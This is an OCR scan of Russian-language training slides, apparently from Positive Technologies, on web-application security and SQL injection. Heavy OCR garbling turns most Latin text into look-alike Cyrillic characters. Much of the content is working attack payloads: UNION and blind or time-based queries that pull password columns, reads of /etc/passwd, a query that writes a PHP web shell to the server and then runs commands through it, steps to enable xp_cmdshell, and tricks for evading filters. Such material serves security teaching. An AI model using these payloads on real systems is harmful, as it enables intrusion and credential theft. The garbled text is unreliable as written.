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Введение в тему безопасности ѴѴеЬ-приложений 



РОНІТІѴЕ ТЕСНІМОСОЕІЕЕ 







































Опасный мир ѴѴеЬ-приложений 


V По данным компании Розіііѵе ТесИпоІодіез за 2008 год 

• 83% сайтов содержат критические уязвимости 

• 78% сайтов содержат уязвимости средней степени риска 

• вероятность автоматизированного заражения страниц 
уязвимого ѴѴеЬ-приложения вредоносным кодом 
составляет приблизительно 15-20% 

МНр://рІзесигіІу.ги/апаІуІісз.азр 


Данные основываются на проведении 16121 автоматических сканирований, детальном анализе 
59 ѴѴеЬ-приложений, в том числе с проведением анализа исходного кода более 10-ти из них. 






Опасный мир ѴѴеЬ-приложений: статистика за 2008 г. 


Обратный путь в директориях 


Недостаточная аутентификация 



і 


39% 



30% 


Учетчка информации 


Межсайтовое выполнение сценариев 



54% 
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Часть 1: Уязвимость типа внедрение операторов 5<2І_ 


Классическая техника эксплуатации уязвимости 
«Внедрение операторов 5(21.» (5(2І_ Іпіесііоп) 













Наглядный пример внедрения операторов 5<2І- 


ѴѴеЬ-сервер 


ЬНр://ѵѵеЬ/?ісІ=6329&ргіпІ=Ѵ 



5ЕІ.ЕСТ * * *гот пеѵѵз ѵѵЬеге ісі = 6329 



ій 

63291 


Іоріс 

ІЧет 


пет 


Ѵ/еЬ Зесигііу 


$ Серьезный сбой б сети РасеЬоок - ѴѴІпбоигз Іпіегпеі Ехріогег 
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|вз бМр://ѵѵеЬ/?іб=б329&ргіпІ=Ѵ 

* Л \& Серьезный сбой в сети... 
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Поиск Чіѵе БеагсН" 

’ Страница ▼ 


Р ^ 


Серьезный сбой в сети РасеЬоок 


07 октября, 2009 


№ 


Теги: РасеЬоок. сбой 

В сети РасеЬоок произошел серьезный 
аппаратный сбой, повлекший за собой 
недоступность части функционала сети. Многие 
пользователи социальной сети вчера вечером сообщили, что не могут 
войти в административные интерфейсы собственных блогов. 

В РасеЬоок со общи ли, что занимаются расследованием технических 

< Г ІИ ► 

^ Интернет | Защищенный режим: вкл. + \ 100% ▼ 


ТасеЬоок, 











































Наглядный пример внедрения операторов 5<2І. 


1іНр://ѵѵеЬ/?ісІ=6329+ипіоп+5еІесІ+ісІ,рѵѵсІ,0+Ігот... 



ѴѴеЬ-сервер 


СУБД 



5ЕІ.ЕСТ * Тгот пеѵѵз ѵѵИеге ісі = 6329 ипіоп зеіесі Іс1,рѵѵс1,0 й"от... 



ІСІ 

(оріс 

пет 

6322_ 

Мрілік 

\ѴеЬ Зесигііу... 

/^(2345 

ра$$ѵѵоггі^) 

0 




















































5(21- Іпіесііоп - Базовые знания 


» "Внедрение операторов 5(21»" 

Способ нападения на базу данных в обход межсетевой защиты. 
В этом методе параметры, передаваемые к базе данных через 
ѴѴеЬ-приложения, изменяются таким образом, чтобы изменить 
выполняемый 5(?1_ запрос. 

V Выделяют два вида 5(21. Іп^есііоп 

• 5(}І_ Іпіесііоп в строковом параметре 

Примеры: 

5Е1-ЕСТ * ^гош ІаЫе ѵѵііеге пате = "ф^ЕТС'пате']" 

5ЕІ-ЕСТ ісі, асі Тгот (аЫе ѵѵИеге іі 5 ег_адеп* = 
^ЗЕКѴЕКГНТТР^ЗЕ^АСЕМГТ 

• 5(21. Іпіесііоп в цифровом параметре 

Примеры: 

5ЕІ.ЕСТ Іодіп, пате Тгот (аЫе ѵѵііеге ісі = $_СООКІЕ["ісГ] 

5ЕІ-ЕСТ ісі, пеѵѵз Тгот (аЫе ѵѵНеге пеѵѵз = 123 Іітіі $_Р05Т["Ііті("] 






5(21- Іпіесііоп - Базовые знания 


ѵ Эксплуатацию 5(21. Іп]ес*іоп разделяют в зависимости от 
типа используемой СУБД и условий внедрения 

• Уязвимый запрос может обрабатывать Іпзегі, ІІрсІаіе, Реіеіе 

• Инъекция может быть в любом участке §(}І--запроса 

• ВІіпсІ 5(2І_ Іпіесііоп (слепое внедрение операторов §(}І-) 

• Особенности языка 5(2І_, используемого в разных СУБД 

V Уязвимость 5(2І_-инъекция - это не только уязвимость, 
характерная для ѴѴеЬ-приложений! 







5(21- Ігцесііоп - Базовые знания 

V Анатомия 5(2І_-инъекций 



5<ЗІ_-инъекция может эксплуатироваться как в момент 
проведения атаки, так и по прошествии некоторого времени 













5(21- Ігцесііоп - Базовые знания 


ѵ Способы обнаружения §(}І--инъекций 

• Тестирование функций (Ыаск/ѵѵМіе-Ьох) 

• Фаззинг (Гиггіпд) 

• Статический/динамический/ручной анализ исходного кода 

V Примеры тестирования функций для ННр://5Ііе/?рагат = 123 

НІІр://5ІІе/?рагат = 1' I^Н:р://5і^:е/?ра^ат = 1 , # 

ИНр: / / зііе/ ? ра га т = 1 " 

Н«:р://5і1:е/?рагат = 1 огсіег Ьу 1000 ИН:р://5і1е/?рагат = 1 АИР 1 = 1— 

НІІр://5ІІе/?рагат = 1'— ГіНр://5ІІе/?рагат = 1 АИР 1 = 2— 

■ ■ ■ ■ ■ ■ 

И11р://5і1е/?рагат = 1 , / : * с ГіПр://5іІе/?рагат = Г АИР Ч' = '1 


и т.д. 





5(21- Ігцесііоп - Классическая эксплуатация (Му5<21_) 


Обнаружение уязвимости 

/?ісІ = 1 + ОКОЕК+ВУ+100 

• 5(21- запрос примет вид 

5ЕІ.ЕСТ ісі, пате ^гот (аЫе ѵѵііеге ісі =1 ОКРЕК ВУ 100 

• В результате может быть получено следующее сообщение об ошибке 
ЕККОК 1054 (42522): ІІпкпоѵѵп соіитп '100' іп 'огсіег сіаизе' 

Получение имен таблиц/ колонок (іп7огтаІіоп_зсІіета/перебор) и 
последующее получение данных из найденных таблиц 

/?ісІ = 1+ипіоп+5еІес1+0 / сопса1_ѵѵ5(0хЗаДаЫе_пате,соІитп_пате)+^гот+іп^огта1іоп_5 
сНета.соІитпз 

• 5<2І_ запрос примет вид 

ЗЕЬЕСТ ісі, пате ^гот іаЫе ѵѵііеге ісі =1 ипіоп зеіесі 

0,сопсаІ_ѵуз(0хЗа,ІаЫе_пате,соІитп_пате) ^гот іпТогтаІіоп.зсНета.соІитпз 

• В результате может быть получена требуемая информация в формате 

| 0 | ІаЫе1:соІитп1 | 

I 0 I ІаЫе1:соІитп2 | 





5(21- Ігцесііоп - Различия СУБД 



Му8С>Ь 

М880Ь 

М8 Ассе88 

Огасіе 

БВ2 

Ро8Іцге80Ь 

Объединение строк 

сопсаІ(,) 

сопса(_\ѵ 8 (беііт, ) 


м м^.м м 

' ’ІГ ' 

" сопсаі " 

И И | И м 

' 'II'' 

' 'II'' 

Комментарии 

— и /**/ и # 

- и/* 

Нет 

-и/* 

— 

-и/* 

Объединение запросов 

ипіоп 

ипіоп и ; 

ипіоп 

ипіоп 

ипіоп 

ипіоп и; 

Подзапросы 

ѵ.4.1 >= 

Да 

Нет 

Да 

Да 

Да 

Хранимые процедуры 

Нет 

Да 

Нет 

Да 

Нет 

Да 

Наличие іпГоппаІіоп зсііепіа или 

его аналога 

ѵ.5.0 >= 

Да 

Да 

Да 

Да 

Да 


ѵ Особенности эксплуатации для разных СУБД 

Пример (Му5(2І_): 5ЕІ.ЕСТ * 7гот ІаЫе ѵѵііеге ісі = 1 ипіоп зеіесі 1,2,3 
Пример (РозІдге5(2І_): 5ЕІ_ЕСТ * ^гот ІаЫе ѵѵііеге ісі = 1; зеіесі 1,2,3 

Пример (Огасіе): 5ЕІ-ЕСТ * Ггот ІаЫе ѵѵііеге ісі = 1 ипіоп зеіесі пиІІ,пиІІ,пиІІ ^гот зуз.сіиаі 




















5(21- Ігцесііоп - Эксплуатации для разных СУБД 


■ Му5<21- 4.1> = 

• Первая запись 

/?ісІ = 1 ипіоп зеіесі пате,123 Ггот изегз Іітіі ОД 

• Вторая запись 

/?ісі = 1 ипіоп зеіесі патеД23 Гг от изегз Іітіі 1,1 

» М55(гі_ 

• Первая запись 

/?ісІ = 1 ипіоп зеіесі ІаЫе_пате,123 Ггот (зеіесі гоѵѵ_питЬег() оѵег (огсіег Ьу пате) аз 
гоѵѵпит, пате Ггот изегз) аз I ѵѵНеге Г.гоѵѵпит = 1 

• Вторая запись 

/?ісІ = 1 ипіоп зеіесі ІаЫе_пате,123 Ггот (зеіесі гоѵѵ_питЬег() оѵег (огсіег Ьу пате) аз 
гоѵѵпит, пате Ггот изегз) аз 1: ѵѵГіеге Г.гоѵѵпипі = 2 

Ш 1 РозідгеБдь 

• Первая запись 

/?ісІ = 1 ипіоп зеіесі пате, пиІІ Ггот изегз Іітіі 1 оГГзеГ О 

• Вторая запись 

/?ісІ = 1 ипіоп зеіесі пате, пиІІ Ггот изегз Іітіі 1 оГГзеІ 1 
ИЛИ 

• Первая запись 

/?ісі = 1; зеіесі пате, 123 Ггот изегз Іітіі 1 оГГзеІ О 

• Вторая запись 

/?ісІ = 1; зеіесі пате, 123 Ггот изегз Іітіі 1 оГГзеІ 1 





Часть 2: Слепое внедрение операторов 5(21. 


Слепое внедрение операторов 5(21. (ВІіпсІ Іпіесііоп) 













ВІіпсІ 5(21. Іпіесііоп - Базовые знания 


ѵ "Слепое внедрение операторов 5(21." 

Способ нападения на базу данных в обход межсетевой защиты. 
Эксплуатируя уязвимость 5(2І_ Іпіесііоп «слепым» методом, 
атакующий манипулирует логикой работы приложения 
(Ігие/^аізе). 

V 5<ЗІ_-инъекции данного типа условно можно разделить по 
следующим признакам 
















ВІіпсІ 5(21. Іпіесііоп - Базовые знания 


ѵ Способы обнаружения ВІіпсІ 5(}І--инъекций 


Шр://5і1е/?рагат = -1 ОК 1 = 1 
Шр://5і1е/?рагат = -1 ОК 1 = 1-- 

НІІр://5ІІе/?рагат=-1' 
Шр^/зЛе/Ррагапг^-!' АИР 1 = 2 

НИр^/зЛе/Трагат^!' ОК 'І'г'І 

И«р://511е/?рагат = -1"/* 

НИр : / / зііе/? ра га т = 2 
НКр : / / зііе/? ра га т = 1 
НИр : / /зііе/?ра га т = 2-1 

Шр^/зЛе/Ррагапг^!' АИР 1 = 1 
НКр^/зЛе/Ррагагг^!' АИР '1' = '1 
■ ■ ■ 

И Т.д. 


ѵ Способы обнаружения йоиЫе ЫіпсІ 5(2І_-инъекций 

И«:р://5і1е/?рагат = -1 АИР ЬепсІітагк(2000,тсІ5(поѵѵ())) 
НИрг/ХзНе/Ррагагг^-!' АИР ЬепсІітагк(2000,тсІ5(поѵѵ()))-- 


и т.д 





ВІіпсІ 501- Іпіесііоп - Классическая эксплуатация 

(Му50і_) 

Подбор первого символа у первой записи в таблице 

/7ісІ = 1+АМО+555 = іІ(огсІ(тісІ((5еІесІ+раз5+Ігот+и5ег5+ІітіІ+0,1),1,1)) =97,555,777) 

• ЭДІ- запрос примет вид 

5ЕІ-ЕСТ ісі, пате ігот (аЫе ѵѵИеге ісі =1 АІЧР 555 = іІ(огсІ(тісІ((5еІесІ разе Ігот изегз 
Іітіі 0,1), 1,1)) = 97,555,777) 

• В случае, если таблица «изегз» содержит колонку «разз» и первый символ первой 
записи этой колонки равен 97 (символ «а») то, СУБД вернет ТКІІЕ. В противном 
случае - РАІ-5Е. 

Ш Подбор второго символа у первой записи в таблице 

/7ісІ=И-АМО+555 = і^(огсІ(тісІ((5еІес1+ра55+^гот+и5ег5+Ііппі1+0,1), 2,1)) =97,555,777) 

• 5(21- запрос примет вид 

5ЕІ-ЕСТ ісі, пате Тгот ІаЫе ѵѵИеге ісі =1 АМР 555 = іІ(огсІ(тісІ((5еІесІ разе Ігот изегз 
Іітіі 0,1),2,1)) = 97,555,777) 




В случае, если таблица «изегз» содержит колонку «разз» и первый символ первой 
записи этой колонки равен 97 (символ «а») то, СУБД вернет ТКІІЕ. В противном 
случае - РАІ-5Е. 





ВІіпсІ 5(21. Ігцесііоп - Классическая эксплуатация 
(Му5<21-) Ускоряемся... 

Ш 1 Можно ограничить набор подбираемых символов. Например для МР5 - это 
[0-9а-7] или 48-57, 97-102. Кроме того, можно воспользоваться знаками 
неравенства! 

* Подбор первого символа у первой записи в таблице 

/7ісІ = 1+АМО+555 = і7(огсІ(Іоѵѵег(тісІ((5еІесі+ра55+?гот + и5ег5+Іітіі+0,1),1,1)))>97,555,777) 

• В случае, если таблица «изегз» содержит колонку «разе» и первый символ первой 
записи этой колонки больше 97 (символ «а») то, СУБД вернет ТКІІЕ. В противном 
случае - РАІ_5Е. 

9 Подбор первого символа у второй записи в таблице 

/7ісІ = 1+АМО+555 = і^(огсІ(Іоѵѵег(ппісІ((5еІесі+ра55+і : гот + и5ег5+Іітіі+1,1),1,1)))< 102,555,777) 

• В случае, если таблица «изегз» содержит колонку «разз» и первый символ второй 
записи этой колонки меньше 102 (символ «7») то, СУБД вернет ТКІІЕ. В противном 
случае - РАІ_5Е. 

Ш Или более разумный подход 

/7ісІ = 1+АНО+555 = і^(огсІ(Іоѵѵег(тіс1((5еІесі+ра55+^гот + изегз+Іітіі+0,1),1,1)))< 100,555,777) 




Если подбираемый символ меньше 100 (символ «сі»), следовательно либо 
подбираемый символ является символом «сі», либо это символ из диапазона [а-с] 





ВІіпсІ 5(21. Ігцесііоп - Новые методы эксплуатации 
(Му5<21-) ...и еще быстрее... 

За один запрос можно подбирать до 12-ти символов (метод рѵѵагаг Х07'09) 
V Подбор первого символа у первой записи в таблице 


/7ісІ = 1+АМО + 1 + гІіке+сопсаІ(іГ((тісІ((5еІесІ+ра55+^гот + и5ег5+МтіІ+0,1) / 1,1)іп( , 0 , ))>0, 
(0х787В312С3235367О),іГ((тісІ((5еІесІ+ра55+ітот + и5ег5+Ііті1:+0,1) / 1,1)іп( , 1 , ))>0, 
(0х787В312С28),іГ((тісІ((5еІесІ+ра55+^гот + и5ег5+ІітіІ:+0,1) / 1,1)іп( , 2 , ))>0, 
(0х5В5ВЗА5050),іГ((тісІ((5еІесІ+ра55+^гот + и5ег5+ІітіІ+0 / 1) / 1,1)іп( , 3 , ))>0, 
(0х5В5В),іГ((тісІ((5еІесІ+ра55+^гот + и5ег5+Ііті(:+0,1),1,1)іп( , 4 , ))>0, 
(0х28287В317О),іГ((тісІ((5еІесІ+ра55+ітот + и5ег5+Ііті1:+0,1) / 1,1)іп( , 5 , ))>0, 
(0х0),іГ((тісІ((5еІесІ+ра55+^гот + и5ег5+МтіІ+0,1) / 1,1)іп( , б , ))>0, 
(0х28),іГ((тісІ((5еІесІ+ра55+^гот + и5ег5+Ііті1:+0,1) / 1,1)іп( , 7 , ))>0, 
(Ох5В32203150),іГ((тісІ((5еІесІ+ра55+^гот + и5ег5+ІітіІ:+0,1),1,1)іп( , 8 , ))>0, 
(Ох5В5В2Е63682Е5050),іГ((тісІ((5еІесІ+ра55+ітот + и5ег5+Ііті1:+0,1) / 1,1)іп( , 9 , ))>0, 
(0х5С),і^((тісІ((5еІесІ+ра55+^гот + и5ег5+ІітіІ+0,1),1,1)іп( , а , ))>0, 

(зеіесі 1 ипіоп зеіесі 2),(1))))))))))))) 

• В случае, если таблица «изегз» содержит колонку «разе» и первый символ первой 
записи этой колонки в диапазоне [0-9а] то, СУБД вернет ошибку. В противном 
случае единицу т.е. запрос будет являться корректным. 





ВІіпсІ 5(21. Ігцесііоп - Новые методы эксплуатации 
(Му5<21-) ...на той же скорости... 


* Как это работает? 

V Используя недопустимые гедехр-выражения, Му5(2І_ выводит 
уникальные сообщения об ошибке: 

веіес! 1 гедехр і!(1 = 1,"х{1,0}",2) 

#1139 - Со! еггог 'іпѵаіісі гере!і!іоп соип!(5)' !гот гедехр 

зеіес! 1 гедехр і!(1 = 1,"х{1,(",2) 

#1139 - Со! еггог 'Ьгасев по! ЬаІапсесІ' !гот гедехр 

И т.д. 

Примечание: в примере использовались эквиваленты в шестнадцатеричном формате, 
т.е. 0Х787В312С307Р вместо, например, х{1,0} 

V Ошибка также выводиться в случае, когда возвращается две 
записи вместо ожидаемой одной (метод, предложенный ЕІекі): 


зеіес! і!(1 = 1,(зеІес! 1 ипіоп зеіес! 2),2) 
#1242 - БиЬдиегу геіигпз тоге ІНап 1 гоѵѵ 







ВІіпсІ 5(21. Ігцесііоп - Новые методы эксплуатации 
(Му5<21-) ...на той же скорости... 

Ш 1 Если подбирать М05-хеш, то этого можно достигнуть всего в два запроса 
» Запрос 1 


/7ісІ = 1+АІЧО + 1 + гІіке+сопсаІ(іГ((пгіісІ((5еІес1:+ра55+1тот + и5ег5+Іітіі:+0,1),1,1)іп( , 0 , ))>0 / (0х787В312С323 
5367О),і^((тісІ((5еІесІ+ра55+( : гот + и5ег5+ІітіІ:+0,1) / 1,1)іп( , 1'))>0,(0х787В312С28) / іГ((тісІ((5еІесІ+ра55+^ 
^от + и5е^5+Iіті^:+0,1) / 1,1)іп( , 2 , ))>0,(0x5В5ВЗА5^5^) / і^((тісI((5еIес^+ра55+^^от + и5е^5+Iіті1:+0,1),1,1)іп( , 
3'))>0,(0х5В5В),іГ((тісІ((5еІесІ+ра55+Ггот + и5ег5+ІітіІ+0 / 1),1,1)іп( , 4 , ))>0,(0х28287В317О),іГ((тісІ((5еІе 
с^+ра55+^^от + и5е^5+Iіті^+0,1),1,1)іп('5 , ))>0 / (0x0) / і^((тісI((5еIес^+ра55+^^от + и5е^5+Iіті^+0 / 1) / 1,1)іп( , 6 , 
))>0,(0х28),іГ((тісІ((5еІесІ+ра55+Ггот + и5ег5+ІітіІ+0,1),1,1)іп( , 7'))>0,(0х5В322О315О) / іГ((тісІ((5еІесІ:+р 
а55+1 : гот + и5ег5+Ііті1:+0,1) / 1,1)іп( , 8 , ))>0 / (0х5В5В2Е63682Е5О5О) / іГ((тісІ((5еІес1:+ра55+Ггот + и5ег5+ІітіІ 
+ 0,1),1,1)іп('9 , ))>0,(0х5С) / і^((тісІ((5еІес(:+ра55+( : гот + и5ег5+ІітіІ+0,1),1,1)іп( , а , ))>0 / (5еІесІ: 1 ипіоп 
зеіесі 2),(1))))))))))))) 

Если символ не входит в диапазон [0-9а], тогда отправляем запрос 2 
(проверка [Ь-Г]) 

/7ісІ = 1+АІЧ0 + 1 + гІіке+сопсаІ(іГ((тісІ((5еІесІ:+ра55+Ггот + и5ег5+ІітіІ+0,1),1,1)іп( , 0 , ))>0,(0х787В312С323 
5367О),і^((тісІ((5еІесІ+ра55+^гот + и5ег5+ІітіІ+0 / 1) / 1,1)іп('1 , ))>0 / (0х787В312С28) / іГ((тісІ((5еІесІ+ра55+1 : 
^от + и5е^5+Iіті(:+0,1) / 1,1)іп( , 2 , ))>0,(0x5В5ВЗА5^5^),іГ((тісI((5еIес^+ра55+^^от + и5е^5+Iіті1:+0,1),1,1)іп( , 
3'))>0 / (0х5В5В) / іГ((тісІ((5еІесІ+ра55+1тот + и5ег5+ІітіІ+0 / 1),1,1)іп( , 4 , ))>0 / (0х28287В317О) / іГ((тісІ((5еІе 
с^+ра55+Г^от + и5е^5+Iіті^+0,1),1,1)іп( , 5 , ))>0,(0x0) / іГ((тісI((5еIес1:+ра55+( : ^от + и5е^5+Iіті^+0,1) / 1,1)іп( , 6 , 
))>0,(0х28),іГ((тісІ((5еІес1:+ра55+Ггот + изег5+Ііті1:+0,1),1,1)іп( , 7 , ))>0 / (0х5В322О315О) / іГ((тісІ((5еІес1:+р 
аз5+і : гот + и5ег5+ІітіІ+0,1),1,1)іп( , 8 , ))>0,(0х5В5В2Е63682Е5О5О),іГ((тісІ((5еІесІ+ра55+Ггот + и5ег5+ІітіІ 
+ 0 / 1) / 1,1)іп('9 , ))>0 / (0х5С) / і^((тісІ((5еІес1:+ра55+і : гот + и5ег5+Ііті1:+0 / 1) / 1,1)іп( , а , ))>0 / (5еІесІ 1 ипіоп 
зеіесі 2),(1))))))))))))) 





ВІіпсІ 5(21. Ігцесііоп - Новые методы эксплуатации 
(Му5<21-) ...на максимальных скоростях! 

V На основе исследований ({ѵѵагаг с функцией НАМЕ_СОМ5Т() 

Му5(}1_ ѵ. 5.0.12 > ѵ.5.0.64 (Х09'09), новый метод - Ех(гас(ѴаІие() 

зеіесі 1 АИР ЕхІгасІѴаІие(1,сопсаІ(0х5С,(Чезі '))); 

• В результате может быть получено следующее сообщение об ошибке 
(если версия Му5(2І_ 5.1> = ) 

ХРАТН зупіах еггог: 'Х^ез!' 

ШР Таким образом можно просто возвращать интересующие данные 

/7ісІ = 1+АІЧО+ехі:гасі:ѵаІие(1,сопсаі:(Ох5С,(5еІесІ: разе Тгот изегз ІітіІ; ОД))) 

• 5(2І_ запрос примет вид 

5ЕІ.ЕСТ ісі, паше ^гот ІаЫе ѵѵііеге ісі =1 АМР ехІгасІѵаІие(1,сопсаІ(0х5С,(зеІесІ разз 
^гот изегз ІітіІ: ОД))) 

• В результате может быть получена требуемая информация в формате 


■ ХРАТН гупіан еггог: '\ра$шогсІ1 1 

Строка вывода в сообщении об ошибке не может превышать 31 символ. Для 
вывода более длинных строк можно использовать функции тісІ() и т.п. 






ВІіпсІ 5(21. Іщесііоп - Новые методы эксплуатации 
(Му5<21_) Скоростной предел... 


ѵ Как быть, если сообщение об ошибке подавляется? 

* Можно ограничить набор подбираемых символов. Например для МР5 - это 
вхождение в диапазон символов [0-9а-Т] 

ям® В качестве сигнатур использовать заголовки из новостных лент, разделы 
сайта и т.п. 


Реализация: 

/?ісІ = іІ((ппісІ((5еІесІ рѵѵсі Ігогп изегз Іітіі 0,1),1,1)іп( , а , ))>0,(12345),іІ((тісІ((5еІесІ рѵѵсі 
Ігот изегз Іітіі 0,1),1,1)т('Ь'))>0,(12346), .,пиІІ)) 

ИЛИ 


/?ісі = іІ((тісІ((5еІесІ рѵѵсі Ігот изегз Іітіі 

0,1) / 1 / 1)іп( , а , , , Ь , / , с , / , сІѴе , ,Т))>0,(12345) / іІ((тісІ((5еІесІ рѵѵсі Ігот изегз Іітіі 
0,1), ІД^пСОѴІ'/^ѴЗ'^УБУбѴ^ѴвуЭ')) >0,(12346), .,пиІІ)) 


• «12345» и «123456» в данном контексте - это идентификатор новости на сайте 


• Ограничение данного метода: 

■ Подходящая архитектура приложения 

■ Ограничение на длину НТТР-запроса в 4096 байт 







йоиЫе ВІіпсІ 5<2І_ Іпіесііоп - Классическая 
эксплуатация (МуЗС^І.) Тише едешь, дальше будешь;) 

V Эксплуатация уязвимости ОоиЫе ВІіпсІ 5(21. Іпіесііоп основана на 
временных задержках 


Для повышения быстродействия можно ограничить набор подбираемых 
символов. 

Классическая реализация: 

/7ісІ = 1+АМО+і^((а5Сіі(Іоѵѵег(5иЬ5І;гіпд((5еІесІ раззѵѵогсі Тгот изег Іітіі 
0Д),0Д))))=97Д,ЬепсНппагк(2000000,тсІ5(поѵѵ()))) 

• На основе временной задержки ответа от ѵѵеЬ-сервера можно сделать 
умозаключение, что подбираемый символ угадан 

• Манипулируя со значением 2000000, можно добиться приемлемой скорости под 
конкретное приложение 

• Аналог ЬепсИтагкО - зІеер(). Функция 5Іеер() является более безопасной для 
подобных целей, т.к. не использует процессорные ресурсы сервера 





Часть 3: Работа с файловой системой и выполнение 
команд на сервере 


Работа с файловой системой и выполнение команд на 
сервере при эксплуатации уязвимости 5(21. Іп^есНоп 












Работа с файловой системой 


ѵ Общая архитектура работы с файловой системой 
через 5(2Ь Іп іесііоп 


ѵ иісІ=80(ѵѵѵѵѵѵ) дісІ=80(ѵѵѵѵѵѵ) 

• Если происходит обращение к файлу, 
созданному СУБД, то стоит помнить, что 
владельцем файла является пользователь 
СУБД 

V иісІ=88(ту5ЯІ) дісІ=88(ту5ЯІ) 

• Запросы поступают со стороны 
пользователя СУБД (для работы с файловой 
системой требуются привилегии ЯІе_ргіѵ) 

• Обращение к файловой системе 
осуществляет пользователь СУБД (должны 
быть соответствующие разрешения на 
уровне АСЬ) 

• «Текущий каталог» - это каталог СУБД 


Му5СН_® 









Работа с файловой системой - Различия СУБД 



Му80Ь 

М880Ь 

М8 Ассе88 

Огасіе 

Ро8і§ге8<ЗЬ 

Встроенные функции 

Да 

Нет 

Да 

Нет 

Да 

Доступные функции 

1оасі_Ше, Іоасі сіаіа 
іпШе, тіо 
оіГІІс/сІитрЛІс 

Процедуры 
ес] іпвегі 
(тот Ше 

сигс1іг() 

Процедуры 
е^ ішегі 
(гот (Не 

р§_геас1_Л1е(), 
Рё_В_(ііг(), сору, 
и др. 


■V Пример для М55<21_: 

СКЕАТЕ ТАВІ.Е тусіаіа (Мпе ѵагсНаг(8000)); 
ВШ.К Ш5ЕКТ тусіаіа РКОМ 'с:\ЬооЫпі'; 
5ЕІ.ЕСТ * РКОМ тусіаѣа; 

РКОР ТАВІ.Е тусіаіа; 














Работа с файловой системой 

V Пример для Му5(2І_ 


в ЬОАР_РІЬЕ 

• ипіоп зеіесі ІоасІ^іІеС/еіс/раззѵѵсГ) 


в ЬОАР РАТА ШРІІ.Е 

• сгеаіе іаЫе і(а ѵагсІіаг(500)); 

• Іоасі сіаіа іпТіІе ’/еіс/раззѵѵсГ іпіо іаЫе I; 

• зеіесі а Ггот I; 


» 5ЕІ.ЕСТ ІІЧТО ОІГГРІІ.Е и 5ЕІ.ЕСТ INТО ОІЖРРІІ-Е 

• ипіоп зеіесі 1 іпіо оиШІе Т 

• ипіоп зеіесі 1 іпіо сІишрПІе Т 








Выполнение команд на сервере - Различия СУБД 



Му80Ь 

М880Ь 

М8 Ассе88 

Огасіе 

Ро8і§ге8<ЗЬ 

Встроенные функции 

шг* 

Да 

Да 

Нет 

Нет 

Доступные функции 

ЕХЕС 

ЕХЕС 

$Ъе11() 

Собственные 

процедуры 

Собственные 

процедуры 


~ Пример для М55С2І.: 

ЕХЕС хр_стсІ5ІіеІІ 'ірсопЛд /аІГ; 

V Для использования хр_стсІ8ІіеІІ в М55<31_ >= 2005 
необходимо выполнить: 

ЕХЕС 8р_сопбдиге 'зНоѵѵ асіѵапсесі орііопз 1 , 1; 
КЕСОИРІСІЖЕ; 

ЕХЕС 5р_сопбдиге 'хр_стсІ5НеІГ, 1; 

РЕССЖРІСІІКЕ; 















Выполнение команд на сервере 


ѵ Пример для Му5(2І_ 

V Запись ѵѵеЬ-зІіеІІ в файл /ѵѵѵѵѵѵ/ітд/зНеІІ.рНр 

• /Ріс^І + ипіоп+зеІесі+'^еѵаІСф^едиезіЕзНеІІ]);?^ 
+ т*о+ои1Я1е+ , /ммм/1тд/5Не11.рНр' 

V Выполнение команд на сервере 

• /ітд/5^^еII.рИр?5І^еII = ра55^:I^^и('І5 , ); 






Часть 4: Методы обхода фильтров безопасности 



Методы обхода программных фильтров безопасности 












Фильтры поступающих данных. Какие они бывают 


V Прозрачные для ѴѴеЬ-приложения 

• тадіс_яиоІѲ5_дрс, сІізрІау_еггогз, еіс 

• тосІ_геѵѵгіІе, І5АРІ-фильтры, еіс 

ѵ Встроенные функции языка разработки 

• Универсальные 

Пример: асІсІзІазІіезО, асІсІсзІазІіезО, ІіітІзресіаІсГіагзО, е(с 

• Предназначенные для определенной среды 

Пример: туздІ_геаІ_езсаре_5ігіпд(), рд_езсаре_з*гіпд(), 
сІЬх_езсаре_з*гіпд(), еіс 

ѵ Разрабатываемые самим программистом 

Приведение типов 

• Использование регулярных выражений 





Методы обхода фильтров безопасности (1) 


ѵ Использовать кодированное передаваемых данных в 
приложение 


• Строка «цѵѵегіу» может быть представлена неограниченным 
количеством вариаций 

■ Нех-кодирование: 0x717765727479 

■ А5СІІ-представление: сІіаг(113),сІіаг(119),сГіаг(101),сГіаг(114), 
сІіаг(116),сІіаг(121) 

■ Использование шифрования с разным ключом: — і І=р Г щ~)°°Р= 


• Пример: 

- Иех(АЕ5_ЕЫСРІУРТ( , яѵѵеіі;у , ,1)) - это В969А9А0ЮА8Е78РА8ОО7Е299С9СР23О 

■ аеэ_сІесгур1(сопсаІ:(0хВ9, 0x69,0хА9,0хА0,0x1 Р,ОхА8,ОхЕ7,Ох8Р,ОхА8,ОхОО,Ох7Е,0x29,Ох 
9С,0х9С,0хР2,0хЗР),1) - это дѵѵегіу 







Методы обхода фильтров безопасности (2) 


* Использовать представления отсутствующие в фильтре 

• Синонимы функций 

■ СНАКАСТЕК_І-ЕІМСТН() -> СНАК_І.ЕМСТН() 

■ І_ОѴѴЕК() -> І_СА5Е( ) 

■ ОСТЕТ_І_ЕМСТН() -> І.ЕІЧСТН() 

■ І_ОСАТЕ() -> Р05ІТІ0ІЧ() 

■ КЕСЕХРО -> ШЛКЕ() 

■ ЦРРЕРС) -> ІІСА5Е() 

■ и т.д. 

• Обфускация запроса и данных 

■ Примеры обфускации строки «дѵѵегіу»: 

геѵегзе(сопсаІ(іГ(1 / сІіаг(121) / 2) / 0х74,гідІіІ(Іе1 : 1(0х567210 / 2) / 1),Іоѵѵег(тісІ( , ТЕ5Т , / 2 / 1)) / герІасе(0х7 
074,'рІ , / 'ѵѵ , ) / сІіаг(іп5Іг(123321,33) + 110))) 

сопсаІ(ипИех(ІеЛ(сгс32(31337),3)-400),ипИех(сеіІ(аІап(1)*100-2)) / ипИех(гоипсІ(Іод(2)*100)- 
4),сІіаг(114) / сІіаг(гідІіІ:(соІ(31337),2) + 54),сІіаг(роѵѵ(11,2))) 








Методы обхода фильтров безопасности 


* Пример по обходу сигнатур (обфускация запроса) 

• Следующий запрос попадает в сигнатуру приложения 
/7ісІ=1+ипіоп + (5еІесІ+1,2+^гот+Іе5І.и5ег5) 

• Но иногда используемые сигнатуры можно обойти 
/?іс1=1+ипіоп + (5еІесІ+ , х2Чгот+ххх) 

/7ісІ=(1)ипІоп(5еІЕсі(1),тісІ(ІіазІі,1,32)Ггот(іе5і.и5егз)) 
/7ісІ=1 + ипіоп + (5ЕЕесі , 1 , / сопсаі(Іодіп / Ііа5Іі)^гот+Іе5і.и5ег5) 
/?ісІ=(1)ипіоп(((((((5еІесІ(1),Нех(Иа5Н)*гот(*е5І.и5ег5)))))))) 

/?ісІ=(1);ехес( , 5еГ+ , есІ , ( 1 )) 

